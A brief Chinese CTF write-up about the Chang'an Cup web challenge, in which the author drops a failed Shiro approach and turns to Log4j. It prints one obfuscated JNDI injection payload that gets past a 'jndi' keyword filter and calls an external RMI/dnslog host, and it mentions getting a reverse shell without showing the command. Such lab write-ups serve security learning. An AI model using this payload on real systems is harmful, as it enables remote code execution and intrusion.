[长安杯]web-shiro复现

西曲风

 关注

阅读 60

2022-01-12

长安杯-shiro?复现

浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
在这里插入图片描述
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
在这里插入图片描述
jndi被过滤了
进行绕过

${${::-j}ndi:rmi://py2hu7.ceye.io/exp}

在这里插入图片描述
在这里插入图片描述
成功接收到dnslog信息。
构建jndi反弹shell,这里反弹shell的命令需要bypass一下

在这里插入代码片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
反弹的有点慢,但是可以成功反弹shell并拿取flag。

相关推荐

2021长安杯web复现

蓝哆啦呀 73 0 0

长安杯杂项writeup

西特张 72 0 0

[NSSCTF][羊城杯2020]WEB复现

独兜曲 73 0 0

shiro漏洞复现

月半小夜曲_ 71 0 0

Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现

云朵里的佛光 52 0 0

Shiro入门以及Shiro与web整合

color_小浣熊 116 0 0

HDCTF web复现

心智的年轮 66 0 0

东华杯2021 ezgadget复现

M4Y 45 0 0

Shiro集成Web时的Shiro JSP标签

陆佃 73 0 0

Apache shiro550 CVE-2016-4437复现

sullay 8 0 0

精彩评论(0)

0 0 举报